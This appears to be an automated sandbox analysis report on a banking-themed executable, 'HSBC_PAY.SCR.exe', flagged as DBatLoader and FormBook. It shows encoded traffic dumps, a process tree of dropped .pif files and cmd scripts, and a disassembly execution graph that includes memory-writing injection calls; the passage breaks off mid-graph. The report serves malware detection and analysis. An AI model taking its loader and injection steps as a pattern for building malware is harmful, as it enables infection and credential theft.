                                                                  2025-01-03 19:02:00 UTC1390INData Raw: 35 66 34 6a 56 4b 56 6a 5a 53 77 38 63 49 74 2b 6f 66 69 5a 7a 2f 70 77 7a 4f 4c 46 54 4a 66 4a 45 67 58 48 48 39 63 75 31 52 4b 46 6d 35 4b 4d 7a 44 75 79 46 6a 51 38 55 6e 72 6d 47 4f 33 61 4d 79 7a 61 74 37 41 66 39 4c 67 37 74 72 4b 30 35 6b 4a 64 6c 44 39 55 79 68 34 48 64 46 46 62 52 61 72 38 54 6d 55 6e 34 49 72 41 5a 46 35 31 6e 73 59 63 38 56 67 39 68 39 78 69 2f 4f 4d 32 51 4c 71 55 68 41 76 5a 79 45 47 34 4c 32 36 72 38 50 6b 59 34 71 70 2b 77 58 57 31 4f 75 45 7a 75 76 6c 73 2b 66 66 78 36 55 59 76 70 6e 68 35 45 71 33 35 71 52 78 7a 36 50 54 6f 41 41 42 52 35 68 56 75 5a 4e 47 35 68 47 55 63 6b 75 53 58 53 52 32 2b 30 69 4d 6d 68 7a 6b 7a 6c 62 57 6b 62 57 39 30 73 37 78 56 66 51 30 6f 57 30 71 73 65 74 69 59 58 53 63 63 2f 33 72 7a 38 51 31
                                                                  Data Ascii: 5f4jVKVjZSw8cIt+ofiZz/pwzOLFTJfJEgXHH9cu1RKFm5KMzDuyFjQ8UnrmGO3aMyzat7Af9Lg7trK05kJdlD9Uyh4HdFFbRar8TmUn4IrAZF51nsYc8Vg9h9xi/OM2QLqUhAvZyEG4L26r8PkY4qp+wXW1OuEzuvls+ffx6UYvpnh5Eq35qRxz6PToAABR5hVuZNG5hGUckuSXSR2+0iMmhzkzlbWkbW90s7xVfQ0oW0qsetiYXScc/3rz8Q1
                                                                  2025-01-03 19:02:00 UTC1390INData Raw: 70 47 44 70 50 34 43 39 4d 49 70 47 77 65 62 79 31 45 44 7a 6e 68 35 5a 2f 70 43 30 33 68 70 48 46 6c 34 74 65 48 57 77 51 31 69 6f 75 61 78 71 56 78 30 58 43 58 59 69 42 61 42 2f 4c 71 50 62 38 63 54 38 30 78 44 38 73 57 67 37 63 66 71 7a 4f 62 70 39 37 38 58 34 53 52 74 6f 70 72 67 41 33 44 67 64 53 4b 42 75 38 48 71 72 66 43 76 56 74 31 56 62 64 31 72 34 2f 78 47 72 35 6e 6e 77 5a 63 56 6b 70 6a 47 38 67 36 61 2f 56 4f 5a 57 32 66 6c 32 54 6e 4b 66 58 48 79 75 73 42 79 61 52 4b 38 72 34 37 56 54 58 68 52 38 37 48 78 4d 79 5a 55 5a 70 63 6a 78 4c 49 51 34 33 76 4d 6f 78 47 58 44 2f 68 54 30 4e 56 31 54 33 63 55 66 49 65 31 4e 6e 6d 4f 35 79 67 41 37 65 77 77 78 55 32 61 34 4c 67 52 70 4e 37 6a 30 45 78 56 4f 32 65 71 6c 52 35 2b 7a 58 32 58 4a 70 62 61
                                                                  Data Ascii: pGDpP4C9MIpGweby1EDznh5Z/pC03hpHFl4teHWwQ1iouaxqVx0XCXYiBaB/LqPb8cT80xD8sWg7cfqzObp978X4SRtoprgA3DgdSKBu8HqrfCvVt1Vbd1r4/xGr5nnwZcVkpjG8g6a/VOZW2fl2TnKfXHyusByaRK8r47VTXhR87HxMyZUZpcjxLIQ43vMoxGXD/hT0NV1T3cUfIe1NnmO5ygA7ewwxU2a4LgRpN7j0ExVO2eqlR5+zX2XJpba
                                                                  2025-01-03 19:02:00 UTC1390INData Raw: 65 64 6a 4f 42 6f 69 6a 61 52 51 58 6b 42 75 57 46 6b 54 4f 4b 6a 4c 31 43 48 49 48 6c 6a 53 2b 45 69 53 38 2b 4f 42 46 66 36 77 45 4f 50 62 67 48 66 63 4d 47 31 4a 34 52 55 72 35 76 71 33 76 6f 34 78 62 4d 4e 59 2f 4b 6b 58 52 64 37 4c 43 69 46 58 35 70 6d 47 55 68 63 32 78 66 59 30 38 56 67 73 61 50 6f 35 2f 63 41 6d 32 52 59 32 66 62 2b 61 59 43 6e 53 56 52 4f 48 59 68 5a 67 57 73 62 43 4c 43 6a 67 54 38 64 35 6d 4b 5a 76 2f 33 4a 31 6c 5a 7a 58 4e 55 76 76 75 44 48 58 71 62 4a 66 36 48 35 76 43 37 52 4f 71 70 64 52 2f 37 79 4f 57 4d 75 74 2b 47 44 73 4b 65 4a 2b 37 47 2f 53 44 33 56 6b 52 36 55 71 7a 4f 6c 68 65 75 4c 6b 31 49 36 46 39 59 46 69 46 37 6d 4f 35 48 49 53 69 4e 44 39 31 47 77 6f 79 66 45 4a 33 75 6b 52 6d 6a 45 32 76 66 34 4d 4f 68 55 59
                                                                  Data Ascii: edjOBoijaRQXkBuWFkTOKjL1CHIHljS+EiS8+OBFf6wEOPbgHfcMG1J4RUr5vq3vo4xbMNY/KkXRd7LCiFX5pmGUhc2xfY08VgsaPo5/cAm2RY2fb+aYCnSVROHYhZgWsbCLCjgT8d5mKZv/3J1lZzXNUvvuDHXqbJf6H5vC7ROqpdR/7yOWMut+GDsKeJ+7G/SD3VkR6UqzOlheuLk1I6F9YFiF7mO5HISiND91GwoyfEJ3ukRmjE2vf4MOhUY
                                                                  2025-01-03 19:02:00 UTC1390INData Raw: 43 57 57 57 59 30 4a 61 45 59 62 6d 79 67 6b 34 44 5a 65 49 37 4f 32 6e 30 56 76 4a 43 68 2f 64 48 6e 74 2b 57 41 63 52 32 70 39 42 53 53 69 42 76 6b 45 37 34 6c 6a 45 31 4b 41 35 4a 2f 4e 62 73 34 65 48 55 6b 5a 47 4c 50 65 61 49 45 32 7a 4c 6b 36 6c 4c 2b 53 54 61 37 44 38 78 42 6d 43 6a 51 31 41 78 56 58 54 4e 43 6b 4e 5a 4a 2b 45 2f 79 44 39 62 68 64 73 37 74 63 4d 70 52 68 62 59 2b 33 51 79 36 43 65 50 34 4e 59 6d 2f 43 2f 73 4f 63 6e 6a 5a 46 6c 6d 64 64 4d 57 31 50 53 37 4d 30 33 5a 63 4b 71 71 4a 68 4c 6e 2f 44 52 67 54 75 63 62 30 6f 38 6f 35 79 58 6b 2b 56 38 57 59 6b 6d 6e 72 2f 2f 65 32 5a 72 78 71 38 4b 66 33 50 36 72 37 63 65 69 71 62 74 49 69 6d 77 48 63 52 53 6f 41 74 49 76 55 41 58 46 75 30 2f 6e 78 65 47 47 55 4c 32 41 6a 79 58 65 68 49
                                                                  Data Ascii: CWWWY0JaEYbmygk4DZeI7O2n0VvJCh/dHnt+WAcR2p9BSSiBvkE74ljE1KA5J/Nbs4eHUkZGLPeaIE2zLk6lL+STa7D8xBmCjQ1AxVXTNCkNZJ+E/yD9bhds7tcMpRhbY+3Qy6CeP4NYm/C/sOcnjZFlmddMW1PS7M03ZcKqqJhLn/DRgTucb0o8o5yXk+V8WYkmnr//e2Zrxq8Kf3P6r7ceiqbtIimwHcRSoAtIvUAXFu0/nxeGGUL2AjyXehI


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:14:01:54
                                                                  Start date:03/01/2025
                                                                  Path:C:\Users\user\Desktop\HSBC_PAY.SCR.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\HSBC_PAY.SCR.exe"
                                                                  Imagebase:0x400000
                                                                  File size:1'010'688 bytes
                                                                  MD5 hash:23B640CC7B2CFF45CEEF1C718E7095E0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1704893572.000000000224B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1642008766.000000007FD90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:1
                                                                  Start time:14:02:00
                                                                  Start date:03/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:14:02:00
                                                                  Start date:03/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:14:02:01
                                                                  Start date:03/01/2025
                                                                  Path:C:\Users\Public\Libraries\uzonfntK.pif
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\Public\Libraries\uzonfntK.pif
                                                                  Imagebase:0x400000
                                                                  File size:175'800 bytes
                                                                  MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2140430291.00000000292F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 3%, ReversingLabs
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:14:02:14
                                                                  Start date:03/01/2025
                                                                  Path:C:\Users\Public\Libraries\Ktnfnozu.PIF
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\Public\Libraries\Ktnfnozu.PIF"
                                                                  Imagebase:0x400000
                                                                  File size:1'010'688 bytes
                                                                  MD5 hash:23B640CC7B2CFF45CEEF1C718E7095E0
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:Borland Delphi
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 50%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:14:02:15
                                                                  Start date:03/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:14:02:15
                                                                  Start date:03/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:8
                                                                  Start time:14:02:15
                                                                  Start date:03/01/2025
                                                                  Path:C:\Users\Public\Libraries\uzonfntK.pif
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\Public\Libraries\uzonfntK.pif
                                                                  Imagebase:0x400000
                                                                  File size:175'800 bytes
                                                                  MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000001.1848189708.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2214229432.000000001E430000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.2197880197.0000000000F60000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2197880197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:11
                                                                  Start time:14:02:23
                                                                  Start date:03/01/2025
                                                                  Path:C:\Users\Public\Libraries\Ktnfnozu.PIF
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\Public\Libraries\Ktnfnozu.PIF"
                                                                  Imagebase:0x400000
                                                                  File size:1'010'688 bytes
                                                                  MD5 hash:23B640CC7B2CFF45CEEF1C718E7095E0
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:Borland Delphi
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:12
                                                                  Start time:14:02:24
                                                                  Start date:03/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:13
                                                                  Start time:14:02:24
                                                                  Start date:03/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:14
                                                                  Start time:14:02:24
                                                                  Start date:03/01/2025
                                                                  Path:C:\Users\Public\Libraries\uzonfntK.pif
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\Public\Libraries\uzonfntK.pif
                                                                  Imagebase:0x400000
                                                                  File size:175'800 bytes
                                                                  MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000E.00000002.2255713355.0000000000F60000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2255713355.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2280734227.0000000028280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000E.00000001.1938553898.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:15.2%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:10.3%
                                                                    Total number of Nodes:290
                                                                    Total number of Limit Nodes:16
                                                                    execution_graph 25189 2a84e88 25190 2a84e95 25189->25190 25194 2a84e9c 25189->25194 25198 2a84bdc SysAllocStringLen 25190->25198 25195 2a84bfc 25194->25195 25196 2a84c08 25195->25196 25197 2a84c02 SysFreeString 25195->25197 25197->25196 25198->25194 25199 2a81c6c 25200 2a81c7c 25199->25200 25201 2a81d04 25199->25201 25202 2a81c89 25200->25202 25203 2a81cc0 25200->25203 25204 2a81f58 25201->25204 25205 2a81d0d 25201->25205 25208 2a81c94 25202->25208 25247 2a81724 25202->25247 25207 2a81724 10 API calls 25203->25207 25209 2a81fec 25204->25209 25213 2a81f68 25204->25213 25214 2a81fac 25204->25214 25206 2a81d25 25205->25206 25224 2a81e24 25205->25224 25210 2a81d2c 25206->25210 25217 2a81d48 25206->25217 25221 2a81dfc 25206->25221 25211 2a81cd7 25207->25211 25234 2a81a8c 8 API calls 25211->25234 25237 2a81cfd 25211->25237 25220 2a81724 10 API calls 25213->25220 25218 2a81fb2 25214->25218 25222 2a81724 10 API calls 25214->25222 25215 2a81e7c 25216 2a81724 10 API calls 25215->25216 25230 2a81e95 25215->25230 25236 2a81f2c 25216->25236 25226 2a81d79 Sleep 25217->25226 25231 2a81d9c 25217->25231 25219 2a81ca1 25235 2a81cb9 25219->25235 25271 2a81a8c 25219->25271 25223 2a81f82 25220->25223 25227 2a81724 10 API calls 25221->25227 25239 2a81fc1 25222->25239 25238 2a81a8c 8 API calls 25223->25238 25242 2a81fa7 25223->25242 25224->25215 25225 2a81e55 Sleep 25224->25225 25224->25230 25225->25215 25228 2a81e6f Sleep 25225->25228 25229 2a81d91 Sleep 25226->25229 25226->25231 25241 2a81e05 25227->25241 25228->25224 25229->25217 25233 2a81e1d 25234->25237 25236->25230 25240 2a81a8c 8 API calls 25236->25240 25238->25242 25239->25242 25243 2a81a8c 8 API calls 25239->25243 25244 2a81f50 25240->25244 25241->25233 25245 2a81a8c 8 API calls 25241->25245 25246 2a81fe4 25243->25246 25245->25233 25248 2a81968 25247->25248 25249 2a8173c 25247->25249 25250 2a81a80 25248->25250 25251 2a81938 25248->25251 25258 2a817cb Sleep 25249->25258 25259 2a8174e 25249->25259 25252 2a81a89 25250->25252 25253 2a81684 VirtualAlloc 25250->25253 25255 2a81947 Sleep 25251->25255 25264 2a81986 25251->25264 25252->25219 25256 2a816bf 25253->25256 25257 2a816af 25253->25257 25254 2a8175d 25254->25219 25261 2a8195d Sleep 25255->25261 25255->25264 25256->25219 25288 2a81644 25257->25288 25258->25259 25263 2a817e4 Sleep 25258->25263 25259->25254 25260 2a8182c 25259->25260 25265 2a8180a Sleep 25259->25265 25270 2a81838 25260->25270 25294 2a815cc 25260->25294 25261->25251 25263->25249 25266 2a819a4 25264->25266 25267 2a815cc VirtualAlloc 25264->25267 25265->25260 25268 2a81820 Sleep 25265->25268 25266->25219 25267->25266 25268->25259 25270->25219 25272 2a81b6c 25271->25272 25273 2a81aa1 25271->25273 25274 2a816e8 25272->25274 25275 2a81aa7 25272->25275 25273->25275 25277 2a81b13 Sleep 25273->25277 25276 2a81c66 25274->25276 25278 2a81644 2 API calls 25274->25278 25279 2a81ab0 25275->25279 25281 2a81b4b Sleep 25275->25281 25286 2a81b81 25275->25286 25276->25235 25277->25275 25280 2a81b2d Sleep 25277->25280 25282 2a816f5 VirtualFree 25278->25282 25279->25235 25280->25273 25283 2a81b61 Sleep 25281->25283 25281->25286 25284 2a8170d 25282->25284 25283->25275 25284->25235 25285 2a81c00 VirtualFree 25285->25235 25286->25285 25287 2a81ba4 25286->25287 25287->25235 25289 2a81681 25288->25289 25290 2a8164d 25288->25290 25289->25256 25290->25289 25291 2a8164f Sleep 25290->25291 25292 2a81664 25291->25292 25292->25289 25293 2a81668 Sleep 25292->25293 25293->25290 25298 2a81560 25294->25298 25296 2a815d4 VirtualAlloc 25297 2a815eb 25296->25297 25297->25270 25299 2a81500 25298->25299 25299->25296 25300 2aa67bc 26117 2a8480c 25300->26117 26118 2a8481d 26117->26118 26119 2a8485a 26118->26119 26120 2a84843 26118->26120 26135 2a84570 26119->26135 26126 2a84b78 26120->26126 26123 2a8488b 26124 2a84850 26124->26123 26140 2a84500 26124->26140 26127 2a84b85 26126->26127 26134 2a84bb5 26126->26134 26128 2a84bae 26127->26128 26130 2a84b91 26127->26130 26131 2a84570 11 API calls 26128->26131 26146 2a82c44 11 API calls 26130->26146 26131->26134 26132 2a84b9f 26132->26124 26147 2a844ac 26134->26147 26136 2a84598 26135->26136 26137 2a84574 26135->26137 26136->26124 26160 2a82c10 26137->26160 26139 2a84581 26139->26124 26141 2a84504 26140->26141 26142 2a84514 26140->26142 26141->26142 26144 2a84570 11 API calls 26141->26144 26143 2a84542 26142->26143 26145 2a82c2c 11 API calls 26142->26145 26143->26123 26144->26142 26145->26143 26146->26132 26148 2a844b2 26147->26148 26150 2a844cd 26147->26150 26148->26150 26151 2a82c2c 26148->26151 26150->26132 26152 2a82c3a 26151->26152 26154 2a82c30 26151->26154 26152->26150 26153 2a82d19 26159 2a82ce8 7 API calls 26153->26159 26154->26152 26154->26153 26158 2a864cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 26154->26158 26157 2a82d3a 26157->26150 26158->26153 26159->26157 26161 2a82c27 26160->26161 26163 2a82c14 26160->26163 26161->26139 26162 2a82c1e 26162->26139 26163->26162 26165 2a82d19 26163->26165 26168 2a864cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 26163->26168 26169 2a82ce8 7 API calls 26165->26169 26167 2a82d3a 26167->26139 26168->26165 26169->26167 26170 2aac2fc 26180 2a86518 26170->26180 26174 2aac32a 26185 2aabb48 timeSetEvent 26174->26185 26176 2aac334 26177 2aac342 GetMessageA 26176->26177 26178 2aac352 26177->26178 26179 2aac336 TranslateMessage DispatchMessageA 26177->26179 26179->26177 26182 2a86523 26180->26182 26186 2a84168 26182->26186 26184 2a8427c SysAllocStringLen SysFreeString SysReAllocStringLen 26184->26174 26185->26176 26187 2a841ae 26186->26187 26188 2a84227 26187->26188 26192 2a843b8 26187->26192 26200 2a84100 26188->26200 26191 2a843e9 26205 2a8432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 26191->26205 26192->26191 26195 2a843fa 26192->26195 26194 2a843f3 26194->26195 26196 2a8443f FreeLibrary 26195->26196 26197 2a84463 26195->26197 26196->26195 26198 2a8446c 26197->26198 26199 2a84472 ExitProcess 26197->26199 26198->26199 26201 2a84110 26200->26201 26202 2a84143 26200->26202 26201->26202 26203 2a815cc VirtualAlloc 26201->26203 26206 2a85814 26201->26206 26202->26184 26203->26201 26205->26194 26207 2a85824 GetModuleFileNameA 26206->26207 26209 2a85840 26206->26209 26210 2a85a78 GetModuleFileNameA RegOpenKeyExA 26207->26210 26209->26201 26211 2a85afb 26210->26211 26212 2a85abb RegOpenKeyExA 26210->26212 26228 2a858b4 12 API calls 26211->26228 26212->26211 26213 2a85ad9 RegOpenKeyExA 26212->26213 26213->26211 26215 2a85b84 lstrcpynA GetThreadLocale GetLocaleInfoA 26213->26215 26217 2a85bbb 26215->26217 26218 2a85c9e 26215->26218 26216 2a85b20 RegQueryValueExA 26219 2a85b40 RegQueryValueExA 26216->26219 26220 2a85b5e RegCloseKey 26216->26220 26217->26218 26222 2a85bcb lstrlenA 26217->26222 26218->26209 26219->26220 26220->26209 26223 2a85be3 26222->26223 26223->26218 26224 2a85c08 lstrcpynA LoadLibraryExA 26223->26224 26225 2a85c30 26223->26225 26224->26225 26225->26218 26226 2a85c3a lstrcpynA LoadLibraryExA 26225->26226 26226->26218 26227 2a85c6c lstrcpynA LoadLibraryExA 26226->26227 26227->26218 26228->26216 26229 2aabb3c 26232 2a9ec6c 26229->26232 26233 2a9ec74 26232->26233 26233->26233 29215 2a98704 LoadLibraryW 26233->29215 26235 2a9ec96 29220 2a82ee0 QueryPerformanceCounter 26235->29220 26237 2a9ec9b 26238 2a9eca5 InetIsOffline 26237->26238 26239 2a9ecaf 26238->26239 26240 2a9ecc0 26238->26240 26241 2a84500 11 API calls 26239->26241 26242 2a84500 11 API calls 26240->26242 26243 2a9ecbe 26241->26243 26242->26243 26244 2a8480c 11 API calls 26243->26244 26245 2a9eced 26244->26245 26246 2a9ecf5 26245->26246 29223 2a84798 26246->29223 26248 2a9ed18 26249 2a9ed20 26248->26249 26250 2a9ed2a 26249->26250 29238 2a9881c 26250->29238 26253 2a8480c 11 API calls 26254 2a9ed51 26253->26254 26255 2a9ed59 26254->26255 26256 2a84798 11 API calls 26255->26256 26257 2a9ed7c 26256->26257 26258 2a9ed84 26257->26258 29251 2a846a4 26258->29251 29253 2a980c0 29215->29253 29217 2a9873d 29264 2a97cf8 29217->29264 29221 2a82ef8 GetTickCount 29220->29221 29222 2a82eed 29220->29222 29221->26237 29222->26237 29224 2a8479c 29223->29224 29225 2a847fd 29223->29225 29226 2a84500 29224->29226 29227 2a847a4 29224->29227 29228 2a84514 29226->29228 29232 2a84570 11 API calls 29226->29232 29227->29225 29229 2a847b3 29227->29229 29231 2a84500 11 API calls 29227->29231 29230 2a84542 29228->29230 29234 2a82c2c 11 API calls 29228->29234 29233 2a84570 11 API calls 29229->29233 29230->26248 29231->29229 29232->29228 29235 2a847cd 29233->29235 29234->29230 29236 2a84500 11 API calls 29235->29236 29237 2a847f9 29236->29237 29237->26248 29239 2a98830 29238->29239 29240 2a9884f LoadLibraryA 29239->29240 29300 2a8494c 29240->29300 29243 2a8494c 29244 2a98872 GetProcAddress 29243->29244 29245 2a98899 29244->29245 29246 2a97cf8 18 API calls 29245->29246 29247 2a988dd FreeLibrary 29246->29247 29248 2a988f5 29247->29248 29249 2a844d0 11 API calls 29248->29249 29250 2a98902 29249->29250 29250->26253 29252 2a846aa 29251->29252 29254 2a84500 11 API calls 29253->29254 29255 2a980e5 29254->29255 29278 2a9790c 29255->29278 29258 2a84798 11 API calls 29259 2a980ff 29258->29259 29260 2a98107 GetModuleHandleW GetProcAddress GetProcAddress 29259->29260 29261 2a9813a 29260->29261 29284 2a844d0 29261->29284 29265 2a84500 11 API calls 29264->29265 29266 2a97d1d 29265->29266 29267 2a9790c 12 API calls 29266->29267 29268 2a97d2a 29267->29268 29269 2a84798 11 API calls 29268->29269 29270 2a97d3a 29269->29270 29289 2a98018 29270->29289 29273 2a980c0 15 API calls 29274 2a97d53 NtWriteVirtualMemory 29273->29274 29275 2a97d7f 29274->29275 29276 2a844d0 11 API calls 29275->29276 29277 2a97d8c FreeLibrary 29276->29277 29277->26235 29279 2a9791d 29278->29279 29280 2a84b78 11 API calls 29279->29280 29282 2a9792d 29280->29282 29281 2a97999 29281->29258 29282->29281 29288 2a8ba3c CharNextA 29282->29288 29285 2a844d6 29284->29285 29286 2a844fc 29285->29286 29287 2a82c2c 11 API calls 29285->29287 29286->29217 29287->29285 29288->29282 29290 2a84500 11 API calls 29289->29290 29291 2a9803b 29290->29291 29292 2a9790c 12 API calls 29291->29292 29293 2a98048 29292->29293 29294 2a98050 GetModuleHandleA 29293->29294 29295 2a980c0 15 API calls 29294->29295 29296 2a98061 GetModuleHandleA 29295->29296 29297 2a9807f 29296->29297 29298 2a844ac 11 API calls 29297->29298 29299 2a97d4d 29298->29299 29299->29273 29301 2a84950 GetModuleHandleA 29300->29301 29301->29243

                                                                    Executed Functions

                                                                    Function 02A98BA8 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 6797 2a98ba8-2a98bab 6798 2a98bb0-2a98bb5 6797->6798 6798->6798 6799 2a98bb7-2a98c9e call 2a8493c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c 6798->6799 6830 2a9a6ef-2a9a759 call 2a844d0 * 2 call 2a84c0c call 2a844d0 call 2a844ac call 2a844d0 * 2 6799->6830 6831 2a98ca4-2a98d7f call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c 6799->6831 6831->6830 6875 2a98d85-2a990ad call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a830d4 * 2 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 